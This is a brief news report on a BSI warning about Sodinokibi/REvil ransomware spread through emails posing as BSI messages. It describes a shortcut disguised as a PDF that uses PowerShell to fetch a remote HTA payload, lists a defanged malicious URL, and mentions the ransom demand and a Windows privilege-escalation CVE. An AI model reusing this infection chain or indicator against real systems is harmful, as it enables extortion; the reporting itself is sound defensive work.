The German national network security agency BSI issued a warning that hackers spread Sodinokibi ransomware by disguising the official news of BSI emails. The hacker disguised a Windows shortcut as a PDF file, and when the victim opened it, it was infected by the zip package attachment it points to.
Once executed, the shortcut will use the PowerShell command to launch a remote HTA file (short for HTML application) at http://grouphk[.]xyz/out-1308780833.hta, which simply adds the HTTP to the URL of the HTA payload.
According to the German Security Agency, the domain name of the URL for downloading Sodinokibi (also known as REvil and Sodin) payload is the same as the domain name for downloading HTA files. After downloading, Sodinokibi will encrypt the victim’s files and add a random and unique extension to each computer. The software also creates a Notepad document with the extension “HOW-TO-DECRYPT.txt” in all folders, including the way and link to the payment website.
Users will be required to pay $2,500 worth of bitcoin. If you have not paid for more than two days, the amount will be doubled. The ransomware interface also shows the bitcoin address used for payment.
Sodinokibi was also observed while increasing its privileges on compromised machines by exploiting the CVE-2018-8453 vulnerability in the Win32k component present on Windows 7 through 10 and Server editions, as Kaspersky found.